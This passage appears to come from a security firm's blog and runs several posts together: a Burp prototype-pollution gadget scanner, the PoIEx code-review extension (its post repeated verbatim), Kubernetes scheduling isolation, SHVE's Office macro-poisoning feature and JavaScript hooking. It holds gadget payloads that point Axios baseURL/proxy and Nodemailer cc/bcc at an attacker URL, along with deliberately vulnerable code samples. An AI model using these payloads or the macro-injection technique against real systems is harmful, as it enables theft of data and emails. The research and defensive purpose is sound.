Furthermore, all gadgets introduced by the plugin operate out-of-bounds (OOB). This design choice stems from the understanding that the source of pollution might be entirely separate from where a gadget is triggered within the application’s codebase. Therefore, the exploitation occurs asynchronously, relying on OOB techniques that wait for interaction. This method ensures that even if the polluted property is not immediately used, it can still be exploited, once the application interacts with the poisoned prototype. This showcases the versatility and depth of our scanning approach.

Plugin Screenshot

Methodology for Finding Gadgets

To discover gadgets capable of altering an application’s behavior, our approach involved a thorough examination of the documentation for common Node.js libraries. We focused on identifying optional parameters within these libraries that, when modified, could introduce security vulnerabilities or lead to unintended application behaviors. Part of our methodology also includes defining a standard format for describing each gadget within our plugin:

{
"payload": {"<parameter>": "<URL>"},
"description": "<Description>",
"null_payload": {"<parameter>": {}}
}
  • Payload: Represents the actual payload used to exploit the vulnerability. The <URL> placeholder is where the URL of the collaborator is inserted.
  • Description: Provides a brief explanation of what the gadget does or what vulnerability it exploits.
  • Null_payload: Specifies the payload that should be used to revert the changes made by the payload, effectively β€œde-poisoning” the application to prevent any unintended behavior.

This format ensures a consistent and clear way to document and share gadgets among the security community, facilitating the identification, testing, and mitigation of prototype pollution vulnerabilities.

Axios Library

Axios is widely used for making HTTP requests. By examining the Axios documentation and request configuration options, we identified that certain parameters, such as baseURL and proxy, can be exploited for malicious purposes.

  • Vulnerable Code Example:
    app.get("/get-api-key", async (req, res) => {
      try {
          const instance = axios.create({baseURL: "https://doyensec.com"});
          const response = await instance.get("/?api-key=<API_KEY>");
      }
    });
    
  • Gadget Explanation: Manipulating the baseURL parameter allows for the redirection of HTTP requests to a domain controlled by an attacker, potentially facilitating Server-Side Request Forgery (SSRF) or data exfiltration. For the proxy parameter, the key to exploitation lies in the ability to suggest that outgoing HTTP requests could be rerouted through an attacker-controlled proxy. While Burp Collaborator itself does not support acting as a proxy to directly capture or manipulate these requests, the subtle fact that it can detect DNS lookups initiated by the application is crucial. The ability to observe the DNS requests to domains we control, triggered by poisoning the proxy configuration, indicates the application’s acceptance of this poisoned configuration. It highlights the potential vulnerability without the need to directly observe proxy traffic. This insight allows us to infer that with the correct setup (outside of Burp Collaborator), an actual proxy could be deployed to intercept and manipulate HTTP communications fully, demonstrating the vulnerability’s potential exploitability.

  • Gadget for Axios:
    {
      "payload": {"baseURL": "https://<URL>"},
      "description": "Modifies 'baseURL', leading to SSRF or sensitive data exposure in libraries like Axios.",
      "null_payload": {"baseURL": {}}
    },
    {
      "payload": {"proxy": {"protocol": "http", "host": "<URL>", "port": 80}},
      "description": "Sets a proxy to manipulate or intercept HTTP requests, potentially revealing sensitive info.",
      "null_payload": {"proxy": {}}
    }
    

Nodemailer Library

Nodemailer is another library we explored and is primarily used for sending emails. The Nodemailer documentation reveals that parameters like cc and bcc can be exploited to intercept email communications.

  • Vulnerable Code Example:
    transporter.sendMail(mailOptions, (error, info) => {
      if (error) {
          res.status(500).send('500!');
      } else {
          res.send('200 OK');
      }
    });
    
  • Gadget Explanation: By adding ourselves as a cc or bcc recipient in the email configuration, we can potentially intercept all emails sent by the platform, gaining access to sensitive information or communication.

  • Gadget for Nodemailer:
    {
      "payload": {"cc": "email@<URL>"},
      "description": "Adds a CC address in email libraries, potentially intercepting all platform emails.",
      "null_payload": {"cc": {}}
    },
    {
      "payload": {"bcc": "email@<URL>"},
      "description": "Adds a BCC address in email libraries, similar to 'cc', for intercepting emails.",
      "null_payload": {"bcc": {}}
    }
    

Gadget Found

Our methodology emphasizes the importance of understanding library documentation and how optional parameters can be leveraged maliciously. We encourage the community to contribute by identifying and sharing new gadgets. Visit our GitHub repository for a comprehensive installation guide and to start using the tool.

Introducing PoIEx - Points Of Intersection Explorer

We are releasing a previously internal-only tool to improve Infrastructure as Code (IaC) analysis and enhance Visual Studio Code allowing real-time collaboration during manual code analysis activities. We’re excited to announce that PoIEx is now available on Github.

Nowadays, cloud-oriented solutions are no longer a buzzword, cloud providers offer ever more intelligent infrastructure services, handling features ranging from simple object storage to complex tasks such as user authentication and identity access management. With the growing complexity of cloud infrastructure, the interactions between application logic and infrastructure begin to play a critical role in ensuring application security.

With many recent high-profile incidents resulting from an insecure combination of web and cloud related technologies, focusing on the points where they meet is crucial to discover new bugs.

PoIEx is a new Visual Studio Code extension that aids testers in analyzing interactions between code and infrastructure by enumerating, plotting and connecting the so called Points of Intersection.

Introducing the Point of Intersection - A novel approach to IaC-App analysis

A Point of Intersection (PoI) marks where the code interacts with the underlying cloud infrastructure, revealing connections between the implemented logic and the Infrastructure as Code (IaC) defining the configuration of the involved cloud services.

Enumerating PoIs is crucial while performing manual reviews to find hybrid cloud-web vulnerabilities exploitable by tricking the application logic into abusing the underlying infrastructure service.

PoIEx identifies and visualizes PoIs, allowing security engineers and cloud security specialists to better understand and identify security vulnerabilities in cloud-oriented applications.

PoIEx: Enhancing VSCode to support Code Reviews

PoIEx scans the application code and the IaC definition at the same time, leveraging Semgrep and custom rulesets, finds code sections that are IaC-relevant, and visualizes results in a nice and user-friendly view. Engineers can navigate the infrastructure diagram and quickly jump to the relevant application code sections where the selected infrastructure resource is used.

Example infrastructure diagram generation and PoIs exploration

If you use VSCode to audit large codebases you may have noticed that all of its features are tailored towards the needs of the developer community. At Doyensec we have solved this issue with PoiEx. The extension enhances VSCode with all the features required to efficiently perform code reviews, such as advanced collaboration capabilities, notes taking using the VS Code Comments API and integration with Semgrep, allowing it to be used also as a standalone Semgrep and project collaboration tool, without any of its IaC-specific features.

At Doyensec, we use PoIEx as a collaboration and review-enhancement tool.
Below we introduce the non-IaC related features, along with our use cases.

✍️ Notes Taking As Organized Threads

PoIEx adds commenting capabilities to VSCode. Users can place sticky notes to any code locations without editing the codebase.

At Doyensec, we usually organize threads with a naming convention involving prefixes like: VULN, LEAD, TODO, etc. We have found that placing shared annotations directly on the codebase greatly improves efficiency when multiple testers are working on the same project.

Example notes usage with organized threads

In collaboration mode, members receive an interactive notification for every reply or thread creation, enabling real-time sync among the reviewers about leads, notes and vulnerabilities.

πŸ‘¨β€πŸ’» PoIEx as a standalone Semgrep extension for VSCode

PoIEx works also as a standalone VSCode extension for Semgrep. PoIEx allows the user to scan the entire workspace and presents Semgrep findings nicely in the VSCode β€œProblems” tab.

Moreover, by right-clicking the issue, it is possible to apply a flag and update its status as: ❌ false positive,πŸ”₯ Hot or ` βœ… resolved`. The status is synced in collaboration mode to avoid duplicating checks.

The extension settings allow the user to setup custom arguments for Semgrep. As an example we currently use --config /path/to/your/custom-semgrep-rules --metrics off to turn off metrics and set it use our custom rules.

The scan can be started from the extension side-menu and the results are explorable from the VS Code problems sub-menu. Users can use the built-in search functionality in a smart way to find interesting leads.

Example Semgrep results and listed PoIs exploration with emoji flagging

🎯 Project-oriented Design

PoIEx allows for real-time synchronization of findings and comments with other users. When using collaboration features, a MongoDB instance needs to be shared across all collaborators of the team.

The project-oriented design allows us to map projects and share an encryption key with the testers assigned to a specific activity. This design feature ensures that sensitive data is encrypted at rest.

Comments and scan results are synced to a MongoDB instance, while the codebase remains local and each reviewer must share the same version.

A Real-World Analysis Example - Solving Tidbits Ep.1 With PoIEx

In case you are not familiar with it, CloudSec Tidbits is our blogpost series showcasing interesting real-world bugs found by Doyensec during cloud security testing activities. The blog posts & labs can be found in this repository.

Episode 1 describes a specific type of vulnerability affecting the application logic when user-input is used to instantiate the AWS SDK client. Without proper checks, the user could be able to force the app to use the instance role, instead of external credentials, to interact with the AWS service. Depending on the functionality, such a flaw could allow unwanted actions against the internal infrastructure.

Below, we are covering the issue identification in a code review, as soon as the codebase is opened and explored with PoIEx.

Once downloaded and opened in VS Code, examine the codebase for Lab 1, by using PoIEx to run Semgrep and show the infrastructure diagram by selecting the main.tf file. The result should be similar to the following one.

The notifications on aws_s3_bucket.data_internal represent two findings for that bucket. By clicking on it, a new tab is opened to visualize them.

The first group contains PoIs and Semgrep findings, while the second group contains the IaC definition of the clicked entity.

In that case we see that there is an S3 PoI in app/web.go:52. Once clicked, we are redirected at the GetListObjects function defined at web.go#L50. While it is just listing the files in an S3 bucket, both the SDK client config and bucket name are passed as parameters in its signature.

A quick search for its usages will show the vulnerable code

//*aws config initialization
aws_config := &aws.Config{}

if len(imptdata.AccessKey) == 0 || len(imptdata.SecretKey) == 0 {
	fmt.Println("Using nil value for Credentials")
	aws_config.Credentials = nil
} else {
	fmt.Println("Using NewStaticCredentials")
	aws_config.Credentials = credentials.NewStaticCredentials(imptdata.AccessKey, imptdata.SecretKey, "")
}
//list of all objects
allObjects, err := GetListObjects(session_init, aws_config, *aws.String(imptdata.BucketName))

If the aws_config.Credentials is set to nilbecause of a missing key/secret in the input, the credentials provider chain will be used and the instance’s IAM role is assumed. In that case, the automatically retrieved credentials have full access to internal S3 buckets. Quickly jump to the TF definition from the S3 bucket results tab.

After the listing, the DownloadContent function is executed (at web.go line 129 ) and the bucket’s contents are exposed to the user.

At this point, the reviewer knows that if the function is called with an empty AWS Key or Secret, the import data functionality will end up downloading the content with the instance’s role, hence allowing internal bucket names as input.

To exploit the vulnerability, hit the endpoint /importData with empty credentials and the name of an internal bucket (solution at the beginning of Cloudsec Tidbits episode 2).

Stay Tuned!

This project was made with love on the Doyensec Research Island by Michele Lizzit for his master thesis at ETH Zurich under the mentoring of Francesco Lacerenza.

Check out PoIEx! Install the last release from GitHub and contribute with a star, bug reports or suggestions.

Introducing PoIEx - Points Of Intersection Explorer

We are releasing a previously internal-only tool to improve Infrastructure as Code (IaC) analysis and enhance Visual Studio Code allowing real-time collaboration during manual code analysis activities. We’re excited to announce that PoIEx is now available on Github.

Nowadays, cloud-oriented solutions are no longer a buzzword, cloud providers offer ever more intelligent infrastructure services, handling features ranging from simple object storage to complex tasks such as user authentication and identity access management. With the growing complexity of cloud infrastructure, the interactions between application logic and infrastructure begin to play a critical role in ensuring application security.

With many recent high-profile incidents resulting from an insecure combination of web and cloud related technologies, focusing on the points where they meet is crucial to discover new bugs.

PoIEx is a new Visual Studio Code extension that aids testers in analyzing interactions between code and infrastructure by enumerating, plotting and connecting the so called Points of Intersection.

Introducing the Point of Intersection - A novel approach to IaC-App analysis

A Point of Intersection (PoI) marks where the code interacts with the underlying cloud infrastructure, revealing connections between the implemented logic and the Infrastructure as Code (IaC) defining the configuration of the involved cloud services.

Enumerating PoIs is crucial while performing manual reviews to find hybrid cloud-web vulnerabilities exploitable by tricking the application logic into abusing the underlying infrastructure service.

PoIEx identifies and visualizes PoIs, allowing security engineers and cloud security specialists to better understand and identify security vulnerabilities in cloud-oriented applications.

PoIEx: Enhancing VSCode to support Code Reviews

PoIEx scans the application code and the IaC definition at the same time, leveraging Semgrep and custom rulesets, finds code sections that are IaC-relevant, and visualizes results in a nice and user-friendly view. Engineers can navigate the infrastructure diagram and quickly jump to the relevant application code sections where the selected infrastructure resource is used.

Example infrastructure diagram generation and PoIs exploration

If you use VSCode to audit large codebases you may have noticed that all of its features are tailored towards the needs of the developer community. At Doyensec we have solved this issue with PoiEx. The extension enhances VSCode with all the features required to efficiently perform code reviews, such as advanced collaboration capabilities, notes taking using the VS Code Comments API and integration with Semgrep, allowing it to be used also as a standalone Semgrep and project collaboration tool, without any of its IaC-specific features.

At Doyensec, we use PoIEx as a collaboration and review-enhancement tool.
Below we introduce the non-IaC related features, along with our use cases.

✍️ Notes Taking As Organized Threads

PoIEx adds commenting capabilities to VSCode. Users can place sticky notes to any code locations without editing the codebase.

At Doyensec, we usually organize threads with a naming convention involving prefixes like: VULN, LEAD, TODO, etc. We have found that placing shared annotations directly on the codebase greatly improves efficiency when multiple testers are working on the same project.

Example notes usage with organized threads

In collaboration mode, members receive an interactive notification for every reply or thread creation, enabling real-time sync among the reviewers about leads, notes and vulnerabilities.

πŸ‘¨β€πŸ’» PoIEx as a standalone Semgrep extension for VSCode

PoIEx works also as a standalone VSCode extension for Semgrep. PoIEx allows the user to scan the entire workspace and presents Semgrep findings nicely in the VSCode β€œProblems” tab.

Moreover, by right-clicking the issue, it is possible to apply a flag and update its status as: ❌ false positive,πŸ”₯ Hot or ` βœ… resolved`. The status is synced in collaboration mode to avoid duplicating checks.

The extension settings allow the user to setup custom arguments for Semgrep. As an example we currently use --config /path/to/your/custom-semgrep-rules --metrics off to turn off metrics and set it use our custom rules.

The scan can be started from the extension side-menu and the results are explorable from the VS Code problems sub-menu. Users can use the built-in search functionality in a smart way to find interesting leads.

Example Semgrep results and listed PoIs exploration with emoji flagging

🎯 Project-oriented Design

PoIEx allows for real-time synchronization of findings and comments with other users. When using collaboration features, a MongoDB instance needs to be shared across all collaborators of the team.

The project-oriented design allows us to map projects and share an encryption key with the testers assigned to a specific activity. This design feature ensures that sensitive data is encrypted at rest.

Comments and scan results are synced to a MongoDB instance, while the codebase remains local and each reviewer must share the same version.

A Real-World Analysis Example - Solving Tidbits Ep.1 With PoIEx

In case you are not familiar with it, CloudSec Tidbits is our blogpost series showcasing interesting real-world bugs found by Doyensec during cloud security testing activities. The blog posts & labs can be found in this repository.

Episode 1 describes a specific type of vulnerability affecting the application logic when user-input is used to instantiate the AWS SDK client. Without proper checks, the user could be able to force the app to use the instance role, instead of external credentials, to interact with the AWS service. Depending on the functionality, such a flaw could allow unwanted actions against the internal infrastructure.

Below, we are covering the issue identification in a code review, as soon as the codebase is opened and explored with PoIEx.

Once downloaded and opened in VS Code, examine the codebase for Lab 1, by using PoIEx to run Semgrep and show the infrastructure diagram by selecting the main.tf file. The result should be similar to the following one.

The notifications on aws_s3_bucket.data_internal represent two findings for that bucket. By clicking on it, a new tab is opened to visualize them.

The first group contains PoIs and Semgrep findings, while the second group contains the IaC definition of the clicked entity.

In that case we see that there is an S3 PoI in app/web.go:52. Once clicked, we are redirected at the GetListObjects function defined at web.go#L50. While it is just listing the files in an S3 bucket, both the SDK client config and bucket name are passed as parameters in its signature.

A quick search for its usages will show the vulnerable code

//*aws config initialization
aws_config := &aws.Config{}

if len(imptdata.AccessKey) == 0 || len(imptdata.SecretKey) == 0 {
	fmt.Println("Using nil value for Credentials")
	aws_config.Credentials = nil
} else {
	fmt.Println("Using NewStaticCredentials")
	aws_config.Credentials = credentials.NewStaticCredentials(imptdata.AccessKey, imptdata.SecretKey, "")
}
//list of all objects
allObjects, err := GetListObjects(session_init, aws_config, *aws.String(imptdata.BucketName))

If the aws_config.Credentials is set to nilbecause of a missing key/secret in the input, the credentials provider chain will be used and the instance’s IAM role is assumed. In that case, the automatically retrieved credentials have full access to internal S3 buckets. Quickly jump to the TF definition from the S3 bucket results tab.

After the listing, the DownloadContent function is executed (at web.go line 129 ) and the bucket’s contents are exposed to the user.

At this point, the reviewer knows that if the function is called with an empty AWS Key or Secret, the import data functionality will end up downloading the content with the instance’s role, hence allowing internal bucket names as input.

To exploit the vulnerability, hit the endpoint /importData with empty credentials and the name of an internal bucket (solution at the beginning of Cloudsec Tidbits episode 2).

Stay Tuned!

This project was made with love on the Doyensec Research Island by Michele Lizzit for his master thesis at ETH Zurich under the mentoring of Francesco Lacerenza.

Check out PoIEx! Install the last release from GitHub and contribute with a star, bug reports or suggestions.

Kubernetes Scheduling And Secure Design

During testing activities, we usually analyze the design choices and context needs in order to suggest applicable remediations depending on the different Kubernetes deployment patterns. Scheduling is often overlooked in Kubernetes designs. Typically, various mechanisms take precedence, including, but not limited to, admission controllers, network policies, and RBAC configurations.

Nevertheless, a compromised pod could allow attackers to move laterally to other tenants running on the same Kubernetes node. Pod-escaping techniques or shared storage systems could be exploitable to achieve cross-tenant access despite the other security measures.

Having a security-oriented scheduling strategy can help to reduce the overall risk of workload compromise in a comprehensive security design. If critical workloads are separated at the scheduling decision, the blast radius of a compromised pod is reduced. By doing so, lateral movements related to the shared node, from low-risk tasks to business-critical workloads, are prevented.

CloudsecTidbit
Attackers on a compromised pod with nothing around

Kubernetes provides multiple mechanisms to achieve isolation-oriented designs like node tainting or affinity. Below, we describe the scheduling mechanisms offered by Kubernetes and highlight how they contribute to actionable risk reduction.

The following methods to apply a scheduling strategy will be discussed:

Mechanisms for Workloads Separation

As mentioned earlier, isolating tenant workloads from each other helps in reducing the impact of a compromised neighbor. That happens because all pods running on a certain node will belong to a single tenant. Consequently, an attacker capable of escaping from a container will only have access to the containers and the volumes mounted to that node.

Additionally, multiple applications with different authorizations may lead to privileged pods sharing the node with pods having PII data mounted or a different security risk level.

1. nodeSelector

Among the constraints, it is the simplest one operating by just specifying the target node labels inside the pod specification.

Example pod Spec

apiVersion: v1
kind: pod
metadata:
  name: nodeSelector-pod
spec:
  containers:
  - name: nginx
    image: nginx:latest
  nodeSelector:
    myLabel: myvalue

If multiple labels are specified, they are treated as required (AND logic), hence scheduling will happen only on pods respecting all of them.

While it is very useful in low-complexity environments, it could easily become a bottleneck stopping executions if many selectors are specified and not satisfied by nodes. Consequently, it requires good monitoring and dynamic management of the labels assigned to nodes if many constraints need to be applied.

2. nodeName

If the nodeName field in the Spec is set, the kube scheduler simply passes the pod to the kubelet, which then attempts to assign the pod to the specified node.

In that sense, nodeName overwrites other scheduling rules (e.g., nodeSelector,affinity, anti-affinity etc.) since the scheduling decision is pre-defined.

Example pod spec

apiVersion: v1
kind: pod
metadata:
  name: nginx
spec:
  containers:
  - name: nginx
    image: nginx:latest
  nodeName: node-critical-workload

Limitations:

  • The pod will not run if the node in the spec is not running or if it is out of resources to host it
  • Cloud environments like AWS’s EKS come with non predictable node names

Consequently, it requires a detailed management of the available nodes and allocated resources for each group of workloads since the scheduling is pre-defined.

Note: De-facto such an approach invalidates all the computational efficiency benefits of the scheduler and it should be only applied on small groups of critical workloads easy to manage.

3. Affinity & Anti-affinity

The NodeAffinity feature enables the possibility to specify rules for pod scheduling based on some characteristics or labels of nodes. They can be used to ensure that pods are scheduled onto nodes meeting specific requirements (affinity rules) or to avoid scheduling pods in specific environments (anti-affinity rules).

Affinity and anti-affinity rules can be set as either β€œpreferred” (soft) or β€œrequired” (hard): If it’s set as preferredDuringSchedulingIgnoredDuringExecution, this indicates a soft rule. The scheduler will try to adhere to this rule, but may not always do so, especially if adhering to the rule would make scheduling impossible or challenging. If it’s set as requiredDuringSchedulingIgnoredDuringExecution, it’s a hard rule. The scheduler will not schedule the pod unless the condition is met. This can lead to a pod remaining unscheduled (pending) if the condition isn’t met.

In particular, anti-affinity rules could be leveraged to protect critical workloads from sharing the kubelet with non-critical ones. By doing so, the lack of computational optimization will not affect the entire node pool, but just a few instances that will contain business-critical units.

Example of node affinity

apiVersion: v1
kind: pod
metadata:
  name: node-affinity-example
spec:
  affinity:
   nodeAffinity:
      preferredDuringSchedulingIgnoredDuringExecution:
       - weight: 1
         preference:
          matchExpressions:
          - key: net-segment
            operator: In
            values:
            -  segment-x
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: workloadtype
            operator: In
            values:
            - p0wload
            - p1wload
  containers:
  - name: node-affinity-example
    image: registry.k8s.io/pause:2.0

The node is preferred to be in a specific network segment by label and it is required to match either a p0 or p1 workloadtype (custom strategy).

Multiple operators are available and NotIn and DoesNotExist are the specific ones usable to obtain node anti-affinity. From a security standpoint, only hard rules requiring the conditions to be respected matter. The preferredDuringSchedulingIgnoredDuringExecution configuration should be used for computational configurations that can not affect the security posture of the cluster.

4. Inter-pod Affinity and Anti-affinity

Inter-pod affinity and anti-affinity could constrain which nodes the pods can be scheduled on, based on the labels of pods already running on that node.
As specified in Kubernetes documentation:

β€œInter-pod affinity and anti-affinity rules take the form β€œthis pod should (or, in the case of anti-affinity, should not) run in an X if that X is already running one or more pods that meet rule Y”, where X is a topology domain like node, rack, cloud provider zone or region, or similar and Y is the rule Kubernetes tries to satisfy.”

Example of anti-affinity

affinity:
  podAntiAffinity:
    requiredDuringSchedulingIgnoredDuringExecution:
    - labelSelector:
        matchExpressions:
        - key: app
          operator: In
          values:
          - testdatabase

In the podAntiAffinity case above, we will never see the pod running on a node where a testdatabase app is running.

It fits designs where it is desired to schedule some pods together or where the system must ensure that certain pods are never going to be scheduled together. In particular, the inter-pod rules allow engineers to define additional constraints within the same execution context without further creating segmentation in terms of node groups. Nevertheless, complex affinity rules could create situations with pods stuck in pending status.

5. Taints and Tolerations

Taints are the opposite of node affinity properties since they allow a node to repel a set of pods not matching some tolerations. They can be applied to a node to make it repel pods unless they explicitly tolerate the taints.

Tolerations are applied to pods and they allow the scheduler to schedule pods with matching taints. It should be highlighted that while tolerations allow scheduling, the decision is not guaranteed.

Each node also defines an action linked to each taint: NoExecute (affects running pods), NoSchedule (hard rule), PreferNoSchedule (soft rule). The approach is ideal for environments where strong isolation of workloads is required. Moreover, it allows the creation of custom node selection rules not based solely on labels and it does not leave flexibility.

6. Pod Topology Spread Constraints

You can use topology spread constraints to control how pods are spread across your cluster among failure-domains such as regions, zones, nodes, and other user-defined topology domains. This can help to achieve high availability as well as efficient resource utilization.

7. Not Satisfied? Custom Scheduler to the Rescue

Kubernetes by default uses the kube-scheduler which follows its own set of criteria for scheduling pods. While the default scheduler is versatile and offers a lot of options, there might be specific security requirements that the default scheduler might not know about. Writing a custom scheduler allows an organization to apply a risk-based scheduling to avoid pairing privileged pods with pods processing or accessing sensitive data.

To create a custom scheduler, you would typically write a program that:

  • Watches for unscheduled pods
  • Implements a scheduling algorithm to decide on which node the pod should run
  • Communicates the decision to the Kubernetes API server.

Some examples of a custom scheduler that can be adapted for this can be found at the following GH repositories: kubernetes-sigs/scheduler-plugins or onuryilmaz/k8s-scheduler-example.
Additionally, a good presentation on crafting your own is Building a Kubernetes Scheduler using Custom Metrics - Mateo Burillo, Sysdig. As mentioned in the talk, this is not for the faint of heart because of the complexity and you might be better off just sticking with the default one if you are not already planning to build one.

Offensive Tips: Scheduling Policies are like Magnets

As described, scheduling policies could be used to attract or repel pods into specific group of nodes.

While a proper strategy reduces the blast radius of a compromised pod, there are still some aspects to take care of from the attacker perspective. In specific cases, the implemented mechanisms could be used either to:

  • Attract critical pods - A compromised node or role able to edit the metadata could be abused to attract pods, which are interesting to the attacker, by manipulating the labels of a controlled node.
    • Carefully review roles and internal processes that could be abused to edit the metadata. Verify the possibility for internal threats to exploit the attraction by influencing or changing the labels and taints
  • Avoid rejection on critical nodes - If users are supposed to submit pod specs or have indirect control over how they are dynamically structured, this could be abused with scheduling sections. An attacker able to submit pod Specs could use scheduling preferences to jump to a critical node.
    • Always review the scheduling strategy to find out the options allowing pods to land on nodes hosting critical workloads. Verify if the user-controlled flows allow adding them or if the logic could be abused by some internal flow
  • Prevent other workloads from being scheduled - In some cases, knowing or reversing the applied strategy could allow a privileged attacker to craft pods to block legitimate workloads at the scheduling decision.
    • Look for a potential mix of labels usable to lock the scheduling on a node

Bonus Section: Node labels security
Normally, the kubelet will still be able to modify labels for a node, potentially allowing a compromised node to tamper with its own labels to trick the scheduler as described above.

A security measure could be applied with the NodeRestriction admission plugin. It basically denies labels editing from the kubelet if the node-restriction.kubernetes.io/ prefix is present in the label.

Wrap-up: Time to Make the Scheduling Decision

Security-wise, dedicated nodes for each namespace/service would constitute the best setup. However, the design would not exploit the Kubernetes capability to optimize computations.

The following examples represent some trade-off choices:

  • Isolate critical namespaces/workloads on their own node group
  • Reserve a node for critical pods of each namespace
  • Deploy a completely independent cluster for critical namespaces

The core concept for a successful approach is having a set of reserved nodes for critical namespaces/workloads. Real world scenarios and complex designs require engineers to plan the fitting mix of mechanisms according to performance requirements and risk tolerance.

This decision starts with defining the workloads’ risks:

  • Different teams, different trust level
    It’s not uncommon for large organizations to have multiple teams deploying to the same cluster. Different teams might have different levels of trustworthiness, training or access. This diversity can introduce varying levels of risks.

  • Data being processed or stored
    Some pods may require mounting customer data or having persistent secrets to perform tasks. Sharing the node with any workload with less hardened workloads may expose the data to a risk

  • Exposed network services on the same node
    Any pod that exposes a network service increases its attack surface. pods interacting with external-facing requests may suffer from this exposure and be more at risk of compromise.

  • pod privileges and capabilities, or its assigned risk
    Some workloads may need some privileges to work or may run code that by its very nature processes potentially unsafe content or third-party vendor code. All these factors can contribute to increasing a workload’s assigned risk.

Once the set of risks within the environment are found, decide the isolation level for teams/data/network traffic/capabilities. Grouping them, if they are part of the same process, could do the trick.

At that point, the amount of workloads in each isolation group should be evaluable and ready to be addressed by mixing the scheduling strategies, according to the size and complexity of each group.

Note: Simple environments should use simple strategies and avoid mixing too many mechanisms if few isolation groups and constraints are present.

Office Documents Poisoning in SHVE

Hello, folks! We’re back with an exciting update on Session Hijacking Visual Exploitation (SHVE) that introduces an insidious twist to traditional exploitation techniques using Office documents. We all know how Office documents laced with macros have been a longstanding entry point for infiltrating systems. SHVE now takes a step further by leveraging XSS vulnerabilities and the inherent trust users have in websites they regularly visit.

Our newest feature integrates the concept of Office document poisoning. Here’s how it works: SHVE allows you to upload templates for .docm, .pptm, and .xslm formats. Whenever a victim of SHVE goes to download one of these document types, the tool will automatically intercept and inject the malicious macros into the file before it is downloaded. What makes this technique particularly sneaky is that the document appears completely normal to the user, maintaining the original content and layout. However, in the background, it executes the malicious payload, unbeknownst to the user.

Office-Poisoning

This approach capitalizes on two critical aspects: the trust users have in documents they download from legitimate websites they visit, and the inherent dangers of macros embedded within Office documents. By combining these two elements, we create a subtle vector for delivering malicious payloads. It’s the wolf in sheep’s clothing, where everything looks as it should be, but the danger lurks within.

To provide a clear demonstration of this technique, we’ve prepared a video illustrating this Office document poisoning in action. Witness how a seemingly innocent download can turn into a nightmare for the end user.

As security researchers and ethical hackers, we need to constantly evolve and adapt our methods. With this update, SHVE not only allows for the exploitation of XSS vulnerabilities but also cleverly abuses the trust mechanisms users have built around their daily digital interactions. This enhancement is not just a step forward in terms of technical capability, but also a reminder of the psychological aspects of security exploitation.

We’re eager to see how the community will leverage these new features in their penetration testing and red teaming engagements. As always, we welcome contributions, and we’re looking forward to your feedback and insights. Stay safe, and happy hacking!

Client-side JavaScript Instrumentation

There is a ton of code that is not worth your time and brain power. Binary reverse engineers commonly skip straight to the important code by using ltrace, strace, or frida. You can do the same for client side JavaScript using only common browser features. This will save time, make testing more fun and help keep your attention span available for the code that deserves your focus.

This blog introduces my thinking processes and practical methods for instrumenting client side JavaScript. This processes have helped me to find deeply embedded bugs in complicated codebases with relative ease. I have been using many of these tricks for so long that I implemented them in a web extension called Eval Villain. While I will introduce you to some of Eval Villain’s brand new features, I will also show how to get the same results without Eval Villain.

General Method and Thinking

Testing an application often raises questions as to how the application works. The client must know the answers to some of these questions if the application is to function. Consider the following questions:

  • What parameters does the server accept?
  • How are parameters encoded/encrypted/serialized?
  • How does the wasm module affect the DOM?
  • Where are the DOM XSS sinks and what sanitization is being applied?
  • Where are the post message handlers?
  • How is cross-origin communication between ads being accomplished?

For the web page to work, it needs to know the answer to these questions. This means we can find our answers in the JavaScript too. Notice that each of these questions imply the use of particular JavaScript functions. For example, how would the client implement a post message handler without ever calling addEventListener? So β€œStep 1” is hooking these interesting functions, verifying the use case is what we are interested in and tracing back. In JavaScript, it would look like this:

(() => {
    const orig = window.addEventListener;
    window.addEventListener = function(a, b) {
        if (a === "message") {
            console.log("postMessage handler found");
            console.log(b); // You can click the output of this to go directly to the handler
            console.trace(); // Find where the handler was registered.
        }
        return orig(...arguments);
    }
})();

Just pasting the above code in the console will work if the handler has not already been registered. However, it is crucial to hook the function before it’s even used. In the next section I will show a simple and practical way to always win that race.

Hooking native JavaScript is β€œStep 1”. This often helps you find interesting code. Sometimes you will want to instrument that code but it’s non-native. This requires a different method that will be covered in the β€œStep 2” section.

Step 1: Hooking native JavaScript

Build your own Extension

While you can use one of many web extensions that will add arbitrary JavaScript to the page, I don’t recommend it. These extensions are often buggy, have race conditions and are difficult to develop in. In most cases, I find it easier to just write my own extension. Don’t be daunted, it is really easy. You only need two files and I already made them for you here.

To load the code in Firefox go to about:debugging#/runtime/this-firefox in the URL bar, click Load Temporary Add-on and navigate to the manifest.json file in the top directory of the extension.

For chrome, go to chrome://extensions/, enable developer mode in the right side and click load unpacked.

The extension should show up in the addon list, where you can quickly enable or disable it. When enabled, the script.js file will load in every web page. The following lines of code log all input to document.write.

	/*********************************************************
	 ***  Your code goes goes here to run in pages scope  ***
	 *********************************************************/

	// example code to dump all arguments to document.write
	document.write = new Proxy(document.write, {
		apply: function(_func, _doc, args) {
			console.group(`[**] document.write.apply arguments`);
				for (const arg of args) {
					console.dir(arg);
				}
			console.groupEnd();
			return Reflect.apply(...arguments);
		}
	});

Temporarily loaded web extention hooks document.write

Replace those lines of code with what ever you want. Your code will run in every page and frame before the page has the opportunity to run its own code.

How it works

The boiler plate uses the manifest file to register a content script. The manifest tells the browser that the content script should run in every frame and before the page loads. Content scripts do not have direct access to the scope of the page they are loaded into but they do have direct access to the DOM. So the boiler plate code just adds a new script into the pages DOM. A CSP can prohibit this, so the extension checks that it worked. If a CSP does block you, just disable the CSP with browser configs, a web extension or an intercepting proxy.

Notice that the instrumentation code ultimately ends up with the same privileges as the website. So your code will be subject to the same restrictions as the page. Such as the same origin policy.

Async and Races

A quick word of warning. The above content script will give you first access to the only JavaScript thread. The website itself can’t run any JavaScript until you give up that thread. Try it out, see if you can make a website that runs document.write before the boiler plate has it hooked.

First access is a huge advantage, you get to poison the environment that the website is about to use. Don’t give up your advantage until you are done poisoning. This means avoiding the use of async functions.

This is why many web extensions intended to inject user JavaScript into a page are buggy. Retrieving user configuration in a web extension is done using an async call. While the async is looking up the user config, the page is running its code and potentially has already executed the sink you wanted to hook. This is why Eval Villain is only available on Firefox. Firefox has a unique API that can register the content script with the user configuration.

Eval Villain

It is very rare that I run into a β€œStep 1” situation that can’t be solved with Eval Villain. Eval Villain is just a content script that hooks sinks and searches input for sources. You can configure almost any native JavaScript functionality to be a sink. Sources include user configure strings or regular expressions, URL parameters, local storage, cookies, URL fragment and window name. These sources are recursively decoded for important substrings. Let’s look at the same page of the example above, this time with Eval Villain in its default configuration.

